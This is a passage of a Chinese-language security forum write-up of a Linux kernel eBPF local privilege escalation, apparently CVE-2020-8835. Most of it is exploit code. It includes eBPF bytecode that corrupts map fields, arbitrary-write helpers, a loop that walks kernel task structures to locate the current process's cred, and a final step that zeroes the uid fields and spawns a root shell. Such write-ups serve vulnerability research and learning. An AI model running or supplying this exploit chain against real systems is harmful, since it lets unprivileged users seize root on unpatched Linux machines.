    update_elem(0x10 + 15*8, *(size_t*)&ops[4 * 0x8]);

之后的步骤通过eBPF实现

BPF_JMP_IMM(BPF_JNE, BPF_REG_7, 3, 60), // if r7!=2; goto exit
            BPF_MOV64_REG(BPF_REG_8, BPF_REG_6),    // r8 = r6
            BPF_ALU64_IMM(BPF_MUL, BPF_REG_6, 0x110),   // r6 = r6*0x110
            BPF_MAP_GET_ADDR(0, BPF_REG_7),             // r7 = &value[0]
            BPF_ALU64_IMM(BPF_SUB, BPF_REG_7, BPF_REG_6),   // r7 -= r6
            BPF_MAP_GET(2, BPF_REG_6),                  // r6 = valeu[2]    
            BPF_STX_MEM(BPF_DW, BPF_REG_7, BPF_REG_6, 0),   //  *(r7+0) = r6
            BPF_MOV64_REG(BPF_REG_6, BPF_REG_7),            //  r6 = r8 ; recovery r6
            BPF_ALU64_IMM(BPF_MUL, BPF_REG_8, 0xf8),        // r8 *= 0xf8
            BPF_MAP_GET_ADDR(0, BPF_REG_7),                 // r7 = &value[0]
            BPF_ALU64_IMM(BPF_SUB, BPF_REG_7, BPF_REG_8),   // r7 -= r8;    r7 = &map.map_type
            BPF_ST_MEM(BPF_W, BPF_REG_7, 0, 0x17),          // *(r7 + 0) = 0x17;    (STACK)
            BPF_MOV64_REG(BPF_REG_8, BPF_REG_6),            // r8 = r6
            BPF_ALU64_IMM(BPF_MUL, BPF_REG_6, 0xec),        // r6 = r6*0xec
            BPF_MAP_GET_ADDR(0, BPF_REG_7),                 // r7 = &value[0]
            BPF_ALU64_IMM(BPF_SUB, BPF_REG_7, BPF_REG_6),   // r7 -= r6;    r7 = &map.max_entries
            BPF_ST_MEM(BPF_W, BPF_REG_7, 0, -1),            // *(r7 + 0) = -1
            BPF_ALU64_IMM(BPF_MUL, BPF_REG_8, 0xe4),        // r8 *= 0xe4
            BPF_MAP_GET_ADDR(0, BPF_REG_7),                 // r7 = &value[0]
            BPF_ALU64_IMM(BPF_SUB, BPF_REG_7, BPF_REG_8),   // r7 -= r8; r7 = &map.spin_lock_off
            BPF_ST_MEM(BPF_W, BPF_REG_7, 0, 0),             // map.spin_lock_off = 0
            BPF_EXIT_INSN(),

任意地址写的方法

void write32(size_t addr, uint32_t data)
{
    uint64_t key = 0;
    data -= 1;
    if (bpf_update_elem(mapfd, &key, &data, addr)) {
        fail("bpf_update_elem failed '%s'\n", strerror(errno));
    }
}
void write64(size_t addr, size_t data)
{
    uint32_t lo = data & 0xffffffff;
    uint32_t hi = (data & 0xffffffff00000000) >> 32;
    uint64_t key = 0;
    write32(addr, lo);
    write32(addr+4, hi);
}
泄漏task_strcut cred

init_pid_ns命名空间的保存着系统所有的进程的task结构,先泄漏init_pid_ns地址(根据之前的内核基地址+偏移计算),再根据任意地址读获取task地址,遍历列表得到指定进程的task结构地址

// Step 4: Leak task_struct 
#define INIT_PID_NS 0x111
    size_t init_pid_ns = linux_base + INIT_PID_NS;
    printf("init_pid_ns: 0x%llx\n", init_pid_ns);
    // get current pid
    pid_t pid = getpid();
    size_t cred_addr = 0;
    size_t task_addr = read64(init_pid_ns + 0x30);  // task_struct* 

    // search curret process's task_struct->cred

    while(1){
        pid_t p = read64(task_addr + 0x908);    // get task_struct's pid
        printf("iter pid: %d...\n", p);

        if(pid == p){
            printf("got target cred!\n");
            cred_addr = read64(task_addr + 0xac8);
            break;
        }
        else{
            // task_struct = task_struct->next
            task_addr = read64(task_addr + 0x808) - 0x808;

        }
    }

LPE

在成功泄漏进程cred地址后,只需要利用构造的任意地址写,完成修改cred即可提权

// Step 7: overwrite cred...
    clear_btf();
    update_elem(0, 0);
    update_elem(1, 3);  //  option = 3 prepare for attr write
    update_elem(2, values_addr + 0x80);     // *(&ops) = value_addr + 0x80(fake_ops)
    write_msg();
    write32(cred_addr+4, 0);
    write32(cred_addr+8, 0);
    write32(cred_addr+12, 0);
    write32(cred_addr+16, 0);
    if(getuid() == 0){
        puts("Spawn shell;");
        system("/bin/sh");
    }
    return 0;

参考

cve-2020-8835-linux-kernel-privilege-escalation-via-improper-ebpf-program-verification

kernel-pwning-with-ebpf-a-love-story

点击收藏 | 0 关注 | 1
  • 动动手指,沙发就是你的了!
登录 后跟帖